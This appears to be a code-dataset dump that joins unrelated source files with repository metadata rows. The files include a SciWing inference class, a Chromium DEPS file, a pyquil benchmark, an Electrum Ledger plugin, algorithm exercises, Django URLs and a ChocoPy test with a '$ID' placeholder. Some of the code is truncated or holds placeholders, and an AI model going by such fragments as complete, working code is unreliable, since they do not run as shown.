from sciwing.utils.vis_seq_tags import VisTagging
from collections import defaultdict
from torch.utils.data import DataLoader
import pandas as pd
import pathlib
class SequenceLabellingInference(BaseSeqLabelInference):
    """Test-time inference driver for sequence-labelling models.

    Wraps a trained model together with its ``DatasetsManager`` to run
    predictions on the test split, report token-classification metrics,
    print confusion matrices, inspect misclassified sentences, label
    arbitrary user input, and write ScienceIE-style prediction folders.
    """

    def __init__(
        self,
        model: nn.Module,
        model_filepath: str,
        datasets_manager: DatasetsManager,
        device: Optional[Union[str, torch.device]] = torch.device("cpu"),
        predicted_tags_namespace_prefix: str = "predicted_tags",
    ):
        """
        Parameters
        ----------
        model : nn.Module
            The trained sequence-labelling model.
        model_filepath : str
            Path of the serialized weights loaded by ``load_model``.
        datasets_manager : DatasetsManager
            Supplies the test dataset and the label<->index mappings for
            every label namespace.
        device : Optional[Union[str, torch.device]]
            Device on which inference runs. Defaults to CPU.
        predicted_tags_namespace_prefix : str
            Prefix of the keys in the model output dict that hold the
            predicted tags for each label namespace.
        """
        super(SequenceLabellingInference, self).__init__(
            model=model,
            model_filepath=model_filepath,
            datasets_manager=datasets_manager,
            device=device,
        )
        self.predicted_tags_namespace_prefix = predicted_tags_namespace_prefix
        self.labels_namespaces = self.datasets_manager.label_namespaces
        self.msg_printer = wasabi.Printer()
        self.metrics_calculator = TokenClassificationAccuracy(
            datasets_manager=datasets_manager
        )
        # The key is the namespace of different labels
        # The value is a dictionary of label->idx (and the reverse below)
        self.label2idx_mapping: Dict[str, Dict[str, Any]] = {}
        self.idx2label_mapping: Dict[str, Dict[str, Any]] = {}
        for namespace in self.labels_namespaces:
            self.label2idx_mapping[
                namespace
            ] = self.datasets_manager.get_label_idx_mapping(label_namespace=namespace)
            self.idx2label_mapping[
                namespace
            ] = self.datasets_manager.get_idx_label_mapping(label_namespace=namespace)
        # Populated by run_test(); None until then.
        self.output_analytics = None
        self.output_df = None
        self.batch_size = 32
        self.load_model()

        # One tag visualizer per namespace, built from that namespace's labels.
        self.namespace_to_unique_categories = {}
        self.namespace_to_visualizer = {}
        for namespace in self.labels_namespaces:
            categories = list(
                set([label for label in self.label2idx_mapping[namespace].keys()])
            )
            visualizer = VisTagging(tags=categories)
            self.namespace_to_unique_categories[namespace] = categories
            self.namespace_to_visualizer[namespace] = visualizer

    def run_inference(self) -> Dict[str, Dict[str, Any]]:
        """Run the model over the whole test split and collect analytics.

        Returns
        -------
        Dict[str, Dict[str, Any]]
            For every label namespace: true/predicted tag indices, the
            corresponding space-joined tag-name strings, and the sentences.
        """
        with self.msg_printer.loading(text="Running inference on test data"):
            loader = DataLoader(
                dataset=self.datasets_manager.test_dataset,
                batch_size=self.batch_size,
                shuffle=False,
                collate_fn=list,
            )
            # output analytics for every label namespace
            output_analytics: Dict[str, Dict[str, Any]] = defaultdict(dict)

            sentences = []  # all the sentences seen so far
            predicted_tag_indices: Dict[str, list] = defaultdict(list)
            # namespace -> all the tags that are predicted for the sentences
            predicted_tag_names: Dict[str, list] = defaultdict(list)
            true_tag_indices: Dict[str, list] = defaultdict(list)
            true_tag_names: Dict[str, list] = defaultdict(list)

            # Fresh metric state for this pass over the test data.
            self.metrics_calculator.reset()

            for lines_labels in loader:
                # collate_fn=list gives [(line, label), ...]; unzip into parallel lists.
                lines_labels_ = list(zip(*lines_labels))
                lines = lines_labels_[0]
                labels = lines_labels_[1]

                batch_sentences = [line.text for line in lines]
                model_output_dict = self.model_forward_on_lines(lines=lines)
                self.metrics_calculator.calc_metric(
                    lines=lines, labels=labels, model_forward_dict=model_output_dict
                )
                sentences.extend(batch_sentences)
                (
                    predicted_tags,
                    predicted_tags_strings,
                ) = self.model_output_dict_to_prediction_indices_names(
                    model_output_dict=model_output_dict
                )
                true_tags, true_labels_strings = self.get_true_label_indices_names(
                    labels=labels
                )
                for namespace in self.labels_namespaces:
                    predicted_tag_indices[namespace].extend(predicted_tags[namespace])
                    predicted_tag_names[namespace].extend(
                        predicted_tags_strings[namespace]
                    )
                    true_tag_indices[namespace].extend(true_tags[namespace])
                    true_tag_names[namespace].extend(true_labels_strings[namespace])

            # Assemble the per-namespace analytics dictionary.
            for namespace in self.labels_namespaces:
                output_analytics[namespace]["true_tag_indices"] = true_tag_indices[
                    namespace
                ]
                output_analytics[namespace][
                    "predicted_tag_indices"
                ] = predicted_tag_indices[namespace]
                output_analytics[namespace]["true_tag_names"] = true_tag_names[
                    namespace
                ]
                output_analytics[namespace][
                    "predicted_tag_names"
                ] = predicted_tag_names[namespace]
                output_analytics[namespace]["sentences"] = sentences

        return output_analytics

    def model_forward_on_lines(self, lines: List[Line]) -> Dict[str, Any]:
        """Forward a batch of lines through the model in test mode, no grad."""
        with torch.no_grad():
            model_output_dict = self.model(
                lines=lines,
                labels=None,
                is_training=False,
                is_validation=False,
                is_test=True,
            )
        return model_output_dict

    def model_output_dict_to_prediction_indices_names(
        self, model_output_dict: Dict[str, Any]
    ) -> (Dict[str, List[int]], Dict[str, List[str]]):
        """Split the model output into per-namespace tag indices and tag-name strings.

        Returns a pair of dicts keyed by namespace: the raw predicted tag
        indices per line, and the corresponding space-joined label names.
        """
        predicted_tags_indices_ = defaultdict(list)
        predicted_tags_strings_ = defaultdict(list)
        for namespace in self.labels_namespaces:
            # List[List[int]] — per-line predicted tag indices for this namespace
            batch_tags = model_output_dict[
                f"{self.predicted_tags_namespace_prefix}_{namespace}"
            ]
            predicted_tags_indices_[namespace].extend(batch_tags)
            for predicted_tags in batch_tags:
                # Map indices back to label names and join into one string per line.
                predicted_tag_string = [
                    self.idx2label_mapping[namespace][predicted_tag_idx]
                    for predicted_tag_idx in predicted_tags
                ]
                predicted_tag_string = " ".join(predicted_tag_string)
                predicted_tags_strings_[namespace].append(predicted_tag_string)

        return predicted_tags_indices_, predicted_tags_strings_

    def get_true_label_indices_names(
        self, labels: List[SeqLabel]
    ) -> (Dict[str, List[int]], Dict[str, List[str]]):
        """Convert gold ``SeqLabel`` objects to per-namespace indices and name strings."""
        true_labels_indices = defaultdict(list)
        true_labels_names = defaultdict(list)
        for namespace in self.labels_namespaces:
            for label in labels:
                label_ = label.tokens[namespace]
                label_ = [tok.text for tok in label_]
                true_labels_names[namespace].append(" ".join(label_))
                label_indices = [
                    self.label2idx_mapping[namespace][tok] for tok in label_
                ]
                true_labels_indices[namespace].append(label_indices)

        return true_labels_indices, true_labels_names

    def report_metrics(self):
        """Print a precision/recall/F1 table for every label namespace."""
        prf_tables = self.metrics_calculator.report_metrics()
        for namespace in self.labels_namespaces:
            self.msg_printer.divider(f"Report for {namespace}")
            print(prf_tables[namespace])

    def run_test(self):
        """Run inference on the test split and cache the analytics.

        Stores the raw analytics dict and a DataFrame view (columns are
        namespaces) used by the inspection helpers below.
        """
        self.output_analytics = self.run_inference()
        self.output_df = pd.DataFrame(self.output_analytics)

    def print_confusion_matrix(self):
        """Print the confusion matrix for the entire test dataset.

        Requires ``run_test`` to have been called first.

        Returns
        -------
        None
        """
        for namespace in self.labels_namespaces:
            # List[List[int]] — per-sentence tag index sequences
            true_tags_indices = self.output_analytics[namespace]["true_tag_indices"]
            predicted_tag_indices = self.output_analytics[namespace][
                "predicted_tag_indices"
            ]
            max_len_pred = max([len(pred_tags) for pred_tags in predicted_tag_indices])
            max_len_true = max([len(true_tags) for true_tags in true_tags_indices])

            # pad everything to the max len of both true and predicted sequences
            max_len = max_len_pred if max_len_pred > max_len_true else max_len_true

            numericalizer = self.datasets_manager.namespace_to_numericalizer[namespace]
            padded_true_tag_indices = numericalizer.pad_batch_instances(
                instances=true_tags_indices,
                max_length=max_len,
                add_start_end_token=False,
            )
            padded_predicted_tag_indices = numericalizer.pad_batch_instances(
                instances=predicted_tag_indices,
                max_length=max_len,
                add_start_end_token=False,
            )
            # Mask marks padding positions so they are excluded from the matrix.
            labels_mask = numericalizer.get_mask_for_batch_instances(
                instances=padded_true_tag_indices
            )
            # we have to pad the true tags indices and predicted tag indices all to max length
            self.metrics_calculator.print_confusion_metrics(
                true_tag_indices=padded_true_tag_indices,
                predicted_tag_indices=padded_predicted_tag_indices,
                labels_mask=labels_mask,
            )

    def get_misclassified_sentences(self, true_label_idx: int, pred_label_idx: int):
        """Print sentences containing a token whose gold tag is ``true_label_idx``
        but which was predicted as ``pred_label_idx``, with both taggings
        rendered side by side. Requires ``run_test`` to have been called.
        """
        for namespace in self.labels_namespaces:
            self.msg_printer.divider(f"Namespace {namespace.lower()}")
            true_tag_indices = self.output_df[namespace].true_tag_indices
            pred_tag_indices = self.output_df[namespace].predicted_tag_indices
            indices = []

            # Collect the sentence indices that contain at least one
            # (true_label_idx -> pred_label_idx) confusion.
            for idx, (true_tag_index, pred_tag_index) in enumerate(
                zip(true_tag_indices, pred_tag_indices)
            ):
                true_tags_pred_tags = zip(true_tag_index, pred_tag_index)
                for true_tag, pred_tag in true_tags_pred_tags:
                    if true_tag == true_label_idx and pred_tag == pred_label_idx:
                        indices.append(idx)
                        break

            for idx in indices:
                sentence = self.output_analytics[namespace]["sentences"][idx].split()
                true_labels = self.output_analytics[namespace]["true_tag_names"][
                    idx
                ].split()
                pred_labels = self.output_analytics[namespace]["predicted_tag_names"][
                    idx
                ].split()

                # Tag sequences can be longer than the sentence (padding);
                # trim them to the sentence length before visualizing.
                len_sentence = len(sentence)
                true_labels = true_labels[:len_sentence]
                pred_labels = pred_labels[:len_sentence]

                stylized_string_true = self.namespace_to_visualizer[
                    namespace
                ].visualize_tokens(sentence, true_labels)
                stylized_string_predicted = self.namespace_to_visualizer[
                    namespace
                ].visualize_tokens(sentence, pred_labels)

                sentence = (
                    f"GOLD LABELS \n{'*' * 80} \n{stylized_string_true} \n\n"
                    f"PREDICTED LABELS \n{'*' * 80} \n{stylized_string_predicted}\n\n"
                )
                print(sentence)

    def on_user_input(self, line: Union[Line, str]) -> Dict[str, List[str]]:
        """Label a single user-provided line; see ``infer_batch``."""
        return self.infer_batch(lines=[line])

    def infer_batch(self, lines: Union[List[Line], List[str]]) -> Dict[str, List[str]]:
        """Predict tag-name strings for a batch of lines.

        Raw strings are first converted to ``Line`` objects via the
        datasets manager; ``Line`` objects are used as-is.
        """
        lines_ = []
        if isinstance(lines[0], str):
            for line in lines:
                line_ = self.datasets_manager.make_line(line=line)
                lines_.append(line_)
        else:
            lines_ = lines

        model_output_dict = self.model_forward_on_lines(lines=lines_)
        _, pred_classnames = self.model_output_dict_to_prediction_indices_names(
            model_output_dict
        )
        return pred_classnames

    def generate_scienceie_prediction_folder(
        self, dev_folder: pathlib.Path, pred_folder: pathlib.Path
    ):
        """Generate the predicted folder for the dataset in the test folder
        for ScienceIE. This is very specific to ScienceIE. Not meant to be used
        with other tasks.

        ScienceIE is a SemEval Task that needs the files to be written into a
        folder and it reports metrics by reading files from that folder. This
        method generates the predicted folder given the dev folder.

        Parameters
        ----------
        dev_folder : pathlib.Path
            The path where the dev files are present
        pred_folder : pathlib.Path
            The path where the predicted files will be written

        Returns
        -------
        None
        """
        science_ie_data_utils = ScienceIEDataUtils(
            folderpath=dev_folder, ignore_warnings=True
        )
        file_ids = science_ie_data_utils.get_file_ids()

        for file_id in file_ids:
            with self.msg_printer.loading(
                f"Generating Science IE results for file {file_id}"
            ):
                text = science_ie_data_utils.get_text_from_fileid(file_id)
                sents = science_ie_data_utils.get_sents(text)

                # Skip files with no text or no sentences rather than failing.
                try:
                    assert bool(text.split()), f"File {file_id} does not have any text"
                except AssertionError:
                    continue

                try:
                    assert len(sents) > 0
                except AssertionError:
                    continue

                conll_filepath = pred_folder.joinpath(f"{file_id}.conll")
                ann_filepath = pred_folder.joinpath(f"{file_id}.ann")
                conll_lines = []

                for sent in sents:
                    line = [token.text for token in sent]
                    line = " ".join(line)
                    prediction_classnames = self.on_user_input(line=line)
                    # First column is the tokens themselves; one tag column per task.
                    tag_names = [line.split()]
                    for namespace in ["TASK", "PROCESS", "MATERIAL"]:
                        # List[str] - List of predicted classnames
                        classnames_ = prediction_classnames[namespace][0].split()
                        tag_names.append(classnames_)
                        assert len(line.split()) == len(
                            classnames_
                        ), f"len sent: {len(line.split())}, len task_tag_name: {len(classnames_)}"

                    # Transpose column lists into per-token rows.
                    zipped_text_tag_names = list(zip(*tag_names))
                    for text_tag_name in zipped_text_tag_names:
                        token, task_tag, process_tag, material_tag = text_tag_name
                        conll_line = " ".join(
                            [token, task_tag, process_tag, material_tag]
                        )
                        conll_lines.append(conll_line)

                with open(conll_filepath, "w") as fp:
                    fp.writelines("\n".join(conll_lines))
                    fp.write("\n")

                science_ie_data_utils.write_ann_file_from_conll_file(
                    conll_filepath=conll_filepath, ann_filepath=ann_filepath, text=text
                )
| [
"abhinav@comp.nus.edu.sg"
] | abhinav@comp.nus.edu.sg |
66494b274cf67dfca2dac51e878dee4bf7d43575 | c8e6cf760a78ec45dbc2d3b6452e352d12da1f43 | /components/unified_consent/DEPS | 42423010fe2e8b1d84ae25a6998fb403a18a2558 | [
"BSD-3-Clause"
] | permissive | tojoyccnu/chromium | 15479d1d9e8159d5eecd61571d33effa78e573b7 | 8cba72403a712767289acb2c7cd06d1116db42cc | refs/heads/master | 2023-03-04T11:55:25.131615 | 2018-06-26T13:34:07 | 2018-06-26T13:34:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | include_rules = [
"+components/autofill/core/common",
"+components/browser_sync",
"+components/keyed_service/core",
"+components/pref_registry",
"+components/prefs",
"+components/sync/base",
"+services/identity/public/cpp",
]
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org | |
4bfcfba3cd42fe4b8758370453ea882fa441832f | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R3/benchmark/startPyquil724.py | ea617cb370afcd2e188b6722dbf150be0426ed29 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | # qubit number=4
# total number=15
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit() -> Program:
    """Build the fixed 4-qubit benchmark circuit (15 numbered operations)."""
    # Gate sequence in application order; the "number=" tags mirror the
    # original generator's bookkeeping.
    gate_sequence = [
        H(0),  # number=1
        H(1),  # number=2
        H(2),  # number=3
        CNOT(0, 2),  # number=12
        X(2),  # number=13
        CNOT(0, 2),  # number=14
        Y(3),  # number=5
        SWAP(1, 0),  # number=7
        H(1),  # number=11
        SWAP(1, 0),  # number=8
        Y(0),  # number=9
        Y(0),  # number=10
    ]
    prog = Program()
    for gate in gate_sequence:
        prog += gate
    return prog
def summrise_results(bitstrings) -> dict:
    """Tally how often each measured bitstring occurs.

    Parameters
    ----------
    bitstrings : iterable of str
        Measurement outcomes, one bitstring per shot.

    Returns
    -------
    dict
        Mapping of bitstring -> occurrence count.
    """
    # Local import keeps the module's top-level dependencies untouched.
    from collections import Counter
    return dict(Counter(bitstrings))
# Script entry point: run the circuit 1024 times on a 4-qubit QVM and write
# the histogram of measured bitstrings to a CSV file.
if __name__ == '__main__':
    prog = make_circuit()
    qvm = get_qc('4q-qvm')

    results = qvm.run_and_measure(prog,1024)
    # Stack per-qubit result arrays and transpose into per-shot rows,
    # then join each row's bits into a single string.
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    writefile = open("../data/startPyquil724.csv","w")
    print(summrise_results(bitstrings),file=writefile)
    writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
fe019310e5d9258fe9c864c492fea1db00791b9c | c9dc1ddbcf752318ab5ee42bc997493fbe6c6689 | /electrum_mue/plugins/ledger/cmdline.py | 5c7be960031d3f307d6ba4ea81368a298583e087 | [
"MIT"
] | permissive | Hser2bio/electrum-mue | 7ea770bda0ddfbf81bdda6627e4be2745700ec00 | 5369056b54e862826b6c3132d15ecd3a3d6b6bc0 | refs/heads/master | 2020-12-10T15:13:15.878787 | 2020-01-13T15:37:30 | 2020-01-13T15:37:30 | 233,629,634 | 0 | 0 | MIT | 2020-01-13T15:36:34 | 2020-01-13T15:36:33 | null | UTF-8 | Python | false | false | 402 | py | from electrum_mue.plugin import hook
from .ledger import LedgerPlugin
from ..hw_wallet import CmdLineHandler
class Plugin(LedgerPlugin):
    """Command-line flavour of the Ledger plugin: one shared CmdLineHandler."""

    handler = CmdLineHandler()

    @hook
    def init_keystore(self, keystore):
        # Attach the shared handler only to keystores of our own type.
        if isinstance(keystore, self.keystore_class):
            keystore.handler = self.handler

    def create_handler(self, window):
        # The window argument is ignored on the command line.
        return self.handler
| [
"sotblad@monetaryunit.org"
] | sotblad@monetaryunit.org |
1db9f9e97f277b0a457c123937a3ea8789882f42 | 30258c8e9c35a21fa3ef13c68dfddd23c56568d6 | /interview_bit/arrays/anti_diagnolas.py | fdf867d0fdc3c9ea09ddccd923fa617706d4387d | [] | no_license | venkatachiranjeevi/algorithms | 3e6d525be36ee34f969d49959df1aaad35fcb1d5 | 83724f647102acba00dd028a81e09888ce980785 | refs/heads/master | 2021-06-11T05:23:57.080523 | 2020-04-14T05:16:20 | 2020-04-14T05:16:20 | 128,548,617 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | __author__ = 'venkat'
class Solution:
    def diagonal(self, a):
        """Return the anti-diagonals of square matrix *a*.

        Diagonal d collects every a[r][c] with r + c == d, for
        d = 0 .. 2*(n-1), each as its own list.
        """
        n = len(a)
        if n < 2:
            return a
        return [
            [a[r][d - r] for r in range(d + 1) if r < n and d - r < n]
            for d in range(2 * n - 1)
        ]
# a = [[1,2,3],[4,5,6],[7,8,9]]
a = [[1,2],[3,4]]
print Solution().diagonal(a) | [
"chiranjeevi.kokku@tjnovandi.com"
] | chiranjeevi.kokku@tjnovandi.com |
f4cd19786978a0c6c8debd52439fa372b7109bce | a8750439f200e4efc11715df797489f30e9828c6 | /LeetCodeContests/53/53_691.py | 511d5fe0c21fd406c29fae78a7dd7384e353ebbe | [] | no_license | rajlath/rkl_codes | f657174305dc85c3fa07a6fff1c7c31cfe6e2f89 | d4bcee3df2f501349feed7a26ef9828573aff873 | refs/heads/master | 2023-02-21T10:16:35.800612 | 2021-01-27T11:43:34 | 2021-01-27T11:43:34 | 110,989,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,441 | py | '''
691. Stickers to Spell Word
User Accepted: 81
User Tried: 374
Total Accepted: 86
Total Submissions: 948
Difficulty: Hard
We are given N different types of stickers. Each sticker has a lowercase English word on it.
You would like to spell out the given target string by cutting individual letters from your collection of stickers and
rearranging them.
You can use each sticker more than once if you want, and you have infinite quantities of each sticker.
What is the minimum number of stickers that you need to spell out the target? If the task is impossible, return -1.
Example 1:
Input:
["with", "example", "science"], "thehat"
Output:
3
Explanation:
We can use 2 "with" stickers, and 1 "example" sticker.
After cutting and rearrange the letters of those stickers, we can form the target "thehat".
Also, this is the minimum number of stickers necessary to form the target string.
Example 2:
Input:
["notice", "possible"], "basicbasic"
Output:
-1
Explanation:
We can't form the target "basicbasic" from cutting letters from the given stickers.
Note:
stickers has length in the range [1, 50].
stickers consists of lowercase English words (without apostrophes).
target has length in the range [1, 15], and consists of lowercase English letters.
In all test cases, all words were chosen randomly from the 1000 most common US English words, and the target was chosen as a concatenation of two random words.
The time limit may be more challenging than usual. It is expected that a 50 sticker test case can be solved within 35ms on average.
'''
class Solution:
    def minStickers(self, stickers, target):
        """Minimum number of stickers whose letters can spell *target*.

        Bitmask DP: dp[mask] is the minimum sticker count needed to cover
        exactly the target positions set in ``mask``; -1 means unreachable.
        Applying one sticker to a state greedily assigns each sticker letter
        to the first still-uncovered matching target position.

        Fixes to the original:
        - dp must start at -1 (unreachable), not 0, with only dp[0] = 0;
          otherwise no state is ever skipped or improved and 0 is returned.
        - ``curr >> r and 1`` used boolean ``and`` — the bit test needs
          ``(curr >> r) & 1``.
        - ``curr = curr or (1 << r)`` used boolean ``or`` — setting the bit
          needs bitwise ``curr |= 1 << r``.

        :type stickers: List[str]
        :type target: str
        :rtype: int  (-1 if the target cannot be formed)
        """
        n = len(target)
        N = 1 << n
        dp = [-1] * N
        dp[0] = 0
        for i in range(N):
            if dp[i] == -1:
                continue  # state not reachable yet
            for sticker in stickers:
                curr = i
                for ch in sticker:
                    # Cover the first uncovered target position matching ch.
                    for r in range(n):
                        if (curr >> r) & 1:
                            continue
                        if target[r] == ch:
                            curr |= 1 << r
                            break
                if dp[curr] == -1 or dp[curr] > dp[i] + 1:
                    dp[curr] = dp[i] + 1
        return dp[N - 1]
# Manual smoke check: expected output is 3 (two "with" stickers + one "example").
sol = Solution()
print(sol.minStickers(["with", "example", "science"], "thehat"))
| [
"raj.lath@gmail.com"
] | raj.lath@gmail.com |
9d8f8b6b297bf6b3d3394f9bb85ee1b6ec510681 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nnascet.py | 66f37df8ca8a54d0f67848e02c441b22984b608c | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 373 | py | ii = [('BentJDO2.py', 2), ('WilbRLW.py', 1), ('LeakWTI2.py', 1), ('LeakWTI3.py', 6), ('LyttELD.py', 1), ('CoopJBT2.py', 2), ('AinsWRR3.py', 1), ('CoolWHM.py', 1), ('ClarGE.py', 1), ('NewmJLP.py', 1), ('CoopJBT.py', 1), ('LeakWTI4.py', 1), ('MedwTAI2.py', 7), ('HogaGMM.py', 1), ('CoolWHM3.py', 1), ('ClarGE3.py', 2), ('TaylIF.py', 20), ('KeigTSS.py', 1), ('BentJDO.py', 7)] | [
"varunwachaspati@gmail.com"
] | varunwachaspati@gmail.com |
308783007d464e193ded9e1583032d78d99f45ff | c3a3ae45f6fb22bdb3c622498c7ff1c2c2732f6a | /day16/s12day16/app01/urls.py | d745ed753408795ea2d072a92291eb19df1d6edb | [] | no_license | huyuedong/S12 | df6b56cf05bb9f9c4a6e54b6a5228f1715e20245 | 61aa6d91f4e70f87c9b4c4b1e2042d5eeb2e2c3d | refs/heads/master | 2020-12-14T08:50:57.514965 | 2016-07-30T01:45:03 | 2016-07-30T01:45:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | """s12day16 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from app01 import views
# URL routes for app01.
# NOTE(review): all patterns except r'^$' lack a leading '^' anchor
# (e.g. r'cash/$'), so they match any URL *ending* in that suffix —
# confirm this is intended.
urlpatterns = [
    url(r'^$', views.payment_index),        # payment landing page
    url(r'cash/$', views.payment_by_cash),  # cash payment flow
    url(r'page1/$', views.page1),
    url(r'page1_1/$', views.page1_1),
]
| [
"liwenzhou7@gmail.com"
] | liwenzhou7@gmail.com |
a12029068bf685dcc7c11d2d1ccc4063dd8dbc54 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/pa3/sample/object_attr_get-108.py | e8818fd053b17f5f19744393b5a5a6900ba499ca | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | class A(object):
a:int = 42
class B(A):
b:bool = True
def __init__(self:"B"):
print("B")
a:A = None
b:B = None
a = b = B()
print(a.a)
print(b.$ID)
print(b.b)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.